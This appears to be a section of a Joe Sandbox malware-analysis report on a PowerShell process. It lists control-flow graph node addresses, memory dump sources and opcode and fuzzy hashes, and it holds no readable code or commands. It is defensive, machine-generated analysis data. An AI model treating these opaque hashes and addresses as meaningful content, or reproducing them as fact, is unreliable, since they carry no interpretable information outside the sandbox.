                                                                                                                                              control_flow_graph 715 48a7360-48a737f 716 48a7485-48a74ec 715->716 717 48a7385-48a7388 715->717 727 48a74fe-48a750e 716->727 728 48a74ee-48a74fd 716->728 772 48a738a call 48a75fc 717->772 773 48a738a call 48a7617 717->773 719 48a7390-48a73a2 720 48a73ae-48a73c3 719->720 721 48a73a4 719->721 729 48a73c9-48a73d9 720->729 730 48a744e-48a7467 720->730 721->720 733 48a751a-48a753d 727->733 734 48a7510 727->734 731 48a73db 729->731 732 48a73e5-48a73f0 729->732 736 48a7469 730->736 737 48a7472-48a7473 730->737 731->732 770 48a73f3 call 48ac008 732->770 771 48a73f3 call 48abff9 732->771 744 48a7549-48a7566 733->744 745 48a753f 733->745 734->733 736->737 737->716 742 48a73f9-48a73fd 746 48a73ff-48a740f 742->746 747 48a743d-48a7448 742->747 752 48a7568 744->752 753 48a7572-48a758a 744->753 745->744 748 48a742b-48a7435 746->748 749 48a7411-48a7421 746->749 747->729 747->730 748->747 754 48a7429 749->754 752->753 757 48a758c 753->757 758 48a75d5-48a75ee 753->758 754->747 760 48a758e-48a759b 757->760 761 48a75f9 758->761 762 48a75f0 758->762 763 48a759d 760->763 764 48a75a7-48a75bd 760->764 762->761 763->764 767 48a75c8-48a75d3 764->767 768 48a75bf-48a75c1 764->768 767->758 767->760 768->767 770->742 771->742 772->719 773->719
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 90bc2978ab6825aeac08fc202faa323418f34b1c296e48a5de3b130f09dcd99d
                                                                                                                                              • Instruction ID: f7ee13dd3902ca7b54482e796e50f2ed220db462039d2e72e93371248e172fa1
                                                                                                                                              • Opcode Fuzzy Hash: 90bc2978ab6825aeac08fc202faa323418f34b1c296e48a5de3b130f09dcd99d
                                                                                                                                              • Instruction Fuzzy Hash: 24813A34B002048FEB14DF68D498AAEBBF6EF8D215F1545A9E406EB361DB74EC41DB60

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 910 48abba8-48abc38 914 48abc3a 910->914 915 48abc3e-48abc49 910->915 914->915 916 48abc4b 915->916 917 48abc4e-48abca8 call 48ab080 915->917 916->917 924 48abcaa-48abcaf 917->924 925 48abcf9-48abcfd 917->925 924->925 926 48abcb1-48abcd4 924->926 927 48abd0e 925->927 928 48abcff-48abd09 925->928 930 48abcda-48abce5 926->930 929 48abd13-48abd15 927->929 928->927 931 48abd3a 929->931 932 48abd17-48abd38 929->932 933 48abcee-48abcf7 930->933 934 48abce7-48abced 930->934 935 48abd42-48abd46 931->935 936 48abd3d call 48aa774 931->936 932->935 933->929 934->933 937 48abd48-48abd71 935->937 938 48abd7f-48abdae 935->938 936->935 937->938
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d570ec1d14ffd1ec52919ca399f10486b81f5d64d15f1c013a0203d174a6e280
                                                                                                                                              • Instruction ID: 7b482fb5f3aa6daa47979af452067aee5d1e33bcb863dea4c19f7195c9ee20ee
                                                                                                                                              • Opcode Fuzzy Hash: d570ec1d14ffd1ec52919ca399f10486b81f5d64d15f1c013a0203d174a6e280
                                                                                                                                              • Instruction Fuzzy Hash: BD611771E012489FEB14CFA9D584B9DFBF2EF88310F14852AE919AB350EB75AD41CB50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 949 48a76c0-48a76f6 952 48a76f8-48a76fa 949->952 953 48a76ff-48a7708 949->953 954 48a77a9-48a77ae 952->954 956 48a770a-48a770c 953->956 957 48a7711-48a772f 953->957 956->954 960 48a7731-48a7733 957->960 961 48a7735-48a7739 957->961 960->954 962 48a773b-48a7740 961->962 963 48a7748-48a774f 961->963 962->963 964 48a77af-48a77e0 963->964 965 48a7751-48a777a 963->965 975 48a7862-48a7866 964->975 976 48a77e6-48a783d 964->976 968 48a7788 965->968 969 48a777c-48a7786 965->969 970 48a778a-48a7796 968->970 969->970 977 48a7798-48a779a 970->977 978 48a779c-48a77a3 970->978 989 48a7869 call 48a78b0 975->989 990 48a7869 call 48a78c0 975->990 985 48a7849-48a7857 976->985 986 48a783f 976->986 977->954 978->954 980 48a786c-48a7871 985->975 988 48a7859-48a7861 985->988 986->985 989->980 990->980
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ff3dd0b3ce4f9e72078cbebfec00af562a7d980056fd88c01f60a243edaecc03
                                                                                                                                              • Instruction ID: 0750eae975b0d45255312dc076f77d32514e5852915d722022974a968396d1db
                                                                                                                                              • Opcode Fuzzy Hash: ff3dd0b3ce4f9e72078cbebfec00af562a7d980056fd88c01f60a243edaecc03
                                                                                                                                              • Instruction Fuzzy Hash: 9051CD353002059FF704DB69E844B6AB7EAEFC8214F248969E50ACB351EB75EC11DBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8057950a10b5cd4b555b1f0048dd9cab485170a79f20e2e8bb20a413d469aed2
                                                                                                                                              • Instruction ID: 5704092f559cc075507ad564e49e9d28d2b1b2db9c303100ba070a45d6a137d8
                                                                                                                                              • Opcode Fuzzy Hash: 8057950a10b5cd4b555b1f0048dd9cab485170a79f20e2e8bb20a413d469aed2
                                                                                                                                              • Instruction Fuzzy Hash: BB512975E012489FEB14CFA9D584B9DFBF2EF88310F14812AE919EB350EB74A945CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf184ab27d36cf6d25c0bb4dd2b97f68030d6a26f2e3cee11ce78a9fe27319b4
                                                                                                                                              • Instruction ID: 76085b73b3cb1c45f145d9d2ec40f790aa6ff3a828d73c3102439cc8ecbc73ee
                                                                                                                                              • Opcode Fuzzy Hash: cf184ab27d36cf6d25c0bb4dd2b97f68030d6a26f2e3cee11ce78a9fe27319b4
                                                                                                                                              • Instruction Fuzzy Hash: 06419C787002098FEB10DFA8C594A2BB7E6EFD92057548968E849CF321EB74EC11CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 320f4ca21ec54fb574c5ece19332a69d37b29ae76e17bab4717987d2fb47710b
                                                                                                                                              • Instruction ID: eedfafddb589f84dddf3768d514f2880c60fad3276a4cc2c5a881c807c12b887
                                                                                                                                              • Opcode Fuzzy Hash: 320f4ca21ec54fb574c5ece19332a69d37b29ae76e17bab4717987d2fb47710b
                                                                                                                                              • Instruction Fuzzy Hash: 544126F1A202039FCB25CE28C550BAA7BF29F80298F1484AADC008F257D735DD45CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4feab481a646117cd49823279df397089df3cd233aa979d9bfbc2a1ac71f5c67
                                                                                                                                              • Instruction ID: 43e2ea8c17d7087d6ae1c4c05cbba3c52249cf3ac6ef0d34aa4ad6cc81b49ec1
                                                                                                                                              • Opcode Fuzzy Hash: 4feab481a646117cd49823279df397089df3cd233aa979d9bfbc2a1ac71f5c67
                                                                                                                                              • Instruction Fuzzy Hash: DA417C387002098FEB10DFA8C594A2BB7E6EF9D2457548968E949CF311EB74EC118BA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1a19f69340b6d39db185a7d75a84ddb3b14ef800b8bd57e8b2beba71c16b3f52
                                                                                                                                              • Instruction ID: 460828427d2db6e5978af5fa41f7d6be030ed60830ba9d4c635915bc3ba1d9ba
                                                                                                                                              • Opcode Fuzzy Hash: 1a19f69340b6d39db185a7d75a84ddb3b14ef800b8bd57e8b2beba71c16b3f52
                                                                                                                                              • Instruction Fuzzy Hash: 7E31AF753006008BE705EB78E844B9EB792EFC9211F048A39D509CB351EFB1EC15CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0e61f7d0c335b030f8e86386f5bdc50e6a39b46dd154ec90c37f36318160d0f
                                                                                                                                              • Instruction ID: d95d9bda668e9bda62bae747d02023509e23645297533f9437893f505ea97c6f
                                                                                                                                              • Opcode Fuzzy Hash: b0e61f7d0c335b030f8e86386f5bdc50e6a39b46dd154ec90c37f36318160d0f
                                                                                                                                              • Instruction Fuzzy Hash: 34318B74A01245CFDB11DF68D894AEEBBF2FF89200F148A69D406EB351DB74AC05CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5c9c4b0f894d786903184db6d80853704e35dda780831f03bce68de722c23c0
                                                                                                                                              • Instruction ID: 46f66873dc7bd1f48e2f3778fd54b021aa9101e7ea741c72c436fdaf87657f57
                                                                                                                                              • Opcode Fuzzy Hash: e5c9c4b0f894d786903184db6d80853704e35dda780831f03bce68de722c23c0
                                                                                                                                              • Instruction Fuzzy Hash: 3D314A34A012058FEB04CF68D498AAEBBF2AF8D311F1445A8E806EB351DB70EC51DB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 155d55a7a12d93a8919b839481e52ca8c44695cc7950cb8e35f15ae26aea4fa4
                                                                                                                                              • Instruction ID: 5bc041df806b32448ee86ea20e9f0cd1d27cca388e626e1e9974fb81272b1a5e
                                                                                                                                              • Opcode Fuzzy Hash: 155d55a7a12d93a8919b839481e52ca8c44695cc7950cb8e35f15ae26aea4fa4
                                                                                                                                              • Instruction Fuzzy Hash: 4C318174A012099FEB08DFB9D4947AEBBF6EF88300F149529D501E7350EBB4AC45CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c4a305b78a61ae4dccb9383e664cf7647f6879e6eb55dca1c1ca7c28319af497
                                                                                                                                              • Instruction ID: 1dca6fc965816ea9a8724a0506d4a457da3841a3e97f6bd43f376b9c1623b8a2
                                                                                                                                              • Opcode Fuzzy Hash: c4a305b78a61ae4dccb9383e664cf7647f6879e6eb55dca1c1ca7c28319af497
                                                                                                                                              • Instruction Fuzzy Hash: 5A317F74A012099FEB08DFA9D5947AEBBF6EF88300F109529D501E7350EBB4AC018B51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6ca8da7c48b2076df29517abde2383c39c8b14db7360b2f14c5197affe09b1f9
                                                                                                                                              • Instruction ID: 50fd0e6f9514229a59a7710381e44323e1bcd1af6152bd39e4318d7bb9dd2a99
                                                                                                                                              • Opcode Fuzzy Hash: 6ca8da7c48b2076df29517abde2383c39c8b14db7360b2f14c5197affe09b1f9
                                                                                                                                              • Instruction Fuzzy Hash: E5317C74A00605DFDB14DFB9D594AEEBBF2FF88200F148A29D416A7390DB74AD05CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ec037d87bb997e271ec6213c13f1b32a00979d56a7c152b2a46a8a28e61fe69a
                                                                                                                                              • Instruction ID: b1993d634dcdfefd04b31d7bca5a3b922d92001b08c34205a479da0a2655848b
                                                                                                                                              • Opcode Fuzzy Hash: ec037d87bb997e271ec6213c13f1b32a00979d56a7c152b2a46a8a28e61fe69a
                                                                                                                                              • Instruction Fuzzy Hash: 5C219275A042088FDB14DFAED84479EBBF5EB89320F14846ED518E7340CA75A905CBA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b5ad28c6e0900e325edd4cfe7d146ed94d75c645086742bba83ca614b7856be
                                                                                                                                              • Instruction ID: 59608cd27b69ac4dd9fd8d2d766ad2a1327c9df75ff17e56d09b231bfd341a26
                                                                                                                                              • Opcode Fuzzy Hash: 5b5ad28c6e0900e325edd4cfe7d146ed94d75c645086742bba83ca614b7856be
                                                                                                                                              • Instruction Fuzzy Hash: BC3188B4E002049FF704EBA8D854BBE7BB2EF84300F114469D611AB395DB75AD01CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0d1c19be5335450707b43bdb57f05914e60fa9299b8d1ea0b2c04434ad9f1a4
                                                                                                                                              • Instruction ID: 9a484157ed0026016f35ae7dd13805218a811a5a8f359d41063bdbba2689e37e
                                                                                                                                              • Opcode Fuzzy Hash: b0d1c19be5335450707b43bdb57f05914e60fa9299b8d1ea0b2c04434ad9f1a4
                                                                                                                                              • Instruction Fuzzy Hash: 9221ADF5A30207DFDB20CFA9C584B6977E1BB05321F04806AEC089B691D374E984CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e6383135006527d2be6330d6de4bf5064a95717c70efef1b661c969143d3ac37
                                                                                                                                              • Instruction ID: ee5648eaac07a93a616f66c2dc5cfb17a5a1d4fd718eba9cbddadc5b575b6424
                                                                                                                                              • Opcode Fuzzy Hash: e6383135006527d2be6330d6de4bf5064a95717c70efef1b661c969143d3ac37
                                                                                                                                              • Instruction Fuzzy Hash: 96312C74A002048FDB14DF69D458AAEBBF2FF88214F14496ED406EB3A1DF74AC85CB95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 82d87c760dd282ac9b83054b9771867ffa28ba23f9265960b87164043bc43ff3
                                                                                                                                              • Instruction ID: aeeaaf7b12c0699c9595d26d08ca5fe9f905d79fd9ac9c641b38155668f24751
                                                                                                                                              • Opcode Fuzzy Hash: 82d87c760dd282ac9b83054b9771867ffa28ba23f9265960b87164043bc43ff3
                                                                                                                                              • Instruction Fuzzy Hash: F1311C74A002048FDB14DF69D458AAEBBF2EF88214F14896ED406E7391DF74AC45CB95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1c0e1b90cdc33fa05dea87476498687ed2d48a9285b63ec3ac5b00da03a69634
                                                                                                                                              • Instruction ID: 8bee0f2206084db45b4a6526e4fcd56fa650723b587129a12136dd6cce11a797
                                                                                                                                              • Opcode Fuzzy Hash: 1c0e1b90cdc33fa05dea87476498687ed2d48a9285b63ec3ac5b00da03a69634
                                                                                                                                              • Instruction Fuzzy Hash: FA3145B4E002089FF704EFA8D459BBE7BB2EF84304F118468D615AB394DB75AD418F90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fb534c01a2c818d3ef02dcfa36524bdbba95a0abd90e4cc29201834dfecc7b98
                                                                                                                                              • Instruction ID: fc47e14b76463afbcde2b982fa67b03c323f326b2b65cae903a8f07511306b40
                                                                                                                                              • Opcode Fuzzy Hash: fb534c01a2c818d3ef02dcfa36524bdbba95a0abd90e4cc29201834dfecc7b98
                                                                                                                                              • Instruction Fuzzy Hash: 1721C175604340DFDF05DF58D9C0B26BB66FB88314F24C5A9ED0A4A3A6C336E856CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3907bd6501f47b9e2d09de26d06d0ea935e7e87b9f8f9840a8e93288b7cb2145
                                                                                                                                              • Instruction ID: 84843c92cd709b7bb0dc11339b78f29411005cac9f8769505c415781bc425df4
                                                                                                                                              • Opcode Fuzzy Hash: 3907bd6501f47b9e2d09de26d06d0ea935e7e87b9f8f9840a8e93288b7cb2145
                                                                                                                                              • Instruction Fuzzy Hash: FD31BFB49093448FEB60CF6AC48838AFFF2EF88314F28C91ED85D97305D6B4A4518B60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e8d8124822ffa053275319545ee3af5daa92a5f2190f6b192b8d87feec6578ca
                                                                                                                                              • Instruction ID: 492ea68cff239aa1ad6703a7e8cd93380d425ee59ae3d76a151abde16bb1e937
                                                                                                                                              • Opcode Fuzzy Hash: e8d8124822ffa053275319545ee3af5daa92a5f2190f6b192b8d87feec6578ca
                                                                                                                                              • Instruction Fuzzy Hash: 44210475604344DFDB14DF18D9C0B26BB65FB84314F24C9ADDA094B3A2C336E846CA61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 844f510cd80a12f440c887d23ea34cb35bc3efdcb784bd8da7c0fce225c1f6f0
                                                                                                                                              • Instruction ID: ef13abe20c49a3865c3b6e18acc3da6fe90d36fc0a5a64b728c193d7a362d5c2
                                                                                                                                              • Opcode Fuzzy Hash: 844f510cd80a12f440c887d23ea34cb35bc3efdcb784bd8da7c0fce225c1f6f0
                                                                                                                                              • Instruction Fuzzy Hash: 89217CB49097448FEB60CF6AC48939AFFF2EF88314F28C91ED85D97215D6B464908B61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8b180536ad09ebed264f366aabb4e704edda3d93e3c552c49d835dd5d6809032
                                                                                                                                              • Instruction ID: 06c589d329e68524be6acc0d6cdfec856cab7ba15ec56e8a67bf5781ff6153a4
                                                                                                                                              • Opcode Fuzzy Hash: 8b180536ad09ebed264f366aabb4e704edda3d93e3c552c49d835dd5d6809032
                                                                                                                                              • Instruction Fuzzy Hash: 8A219AF6A30203DFEB24CE99C184B7573E1BB01221F0880AADC159F5E1C375E984CB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ba3086fd7a8d0cd2f813160701af9ae138b13f75754b0bcaeba020f6c2e017af
                                                                                                                                              • Instruction ID: f354680c3e244efd25c563a537acc4d6d63d050fc98e98cc8e8cf3b758d722e9
                                                                                                                                              • Opcode Fuzzy Hash: ba3086fd7a8d0cd2f813160701af9ae138b13f75754b0bcaeba020f6c2e017af
                                                                                                                                              • Instruction Fuzzy Hash: CA112E357001188FEB04DBA8E844AEE77F6EBCC215B0441A8E909EB314DA34ED559BA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e1f81e3a48462dfb41794e3d5847c8f8df0bd66c26dd441896e995f7946e6986
                                                                                                                                              • Instruction ID: c92c795c86f22c0b57ca52762c7669bf425ac199a2215e5cd85cb94697336d56
                                                                                                                                              • Opcode Fuzzy Hash: e1f81e3a48462dfb41794e3d5847c8f8df0bd66c26dd441896e995f7946e6986
                                                                                                                                              • Instruction Fuzzy Hash: CE218C76504240DFCB06CF54D9C4B16BF72FB84314F24C5AADD094A666C33AE46ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1985984278.000000000471D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0471D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_471d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7990352aed4072c09095ef2a1025238342d23bb705e09bcee6ece32be69e0e97
                                                                                                                                              • Instruction ID: 734bf0266c5de2fcd1c4456abe9d718d8e320e968bd3622c7da714d5759801ac
                                                                                                                                              • Opcode Fuzzy Hash: 7990352aed4072c09095ef2a1025238342d23bb705e09bcee6ece32be69e0e97
                                                                                                                                              • Instruction Fuzzy Hash: 4B119D75504280DFDB15CF14D9C4B15BBA2FB84314F38C6AAD8494B7A6C33AE44ACB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4c1d4cc717819ed5f9eb5dd576a26884628a0ef8041659a1e0cebccd85b9c23a
                                                                                                                                              • Instruction ID: 0df640a669938c8e6493e3d82a207d6c76042aef1a9c24bcef7f753d16e58d95
                                                                                                                                              • Opcode Fuzzy Hash: 4c1d4cc717819ed5f9eb5dd576a26884628a0ef8041659a1e0cebccd85b9c23a
                                                                                                                                              • Instruction Fuzzy Hash: 6601B1316087849FE724CB79D494B9A7BF5EF45210F1488A9D18ECB661DB60F886CB00
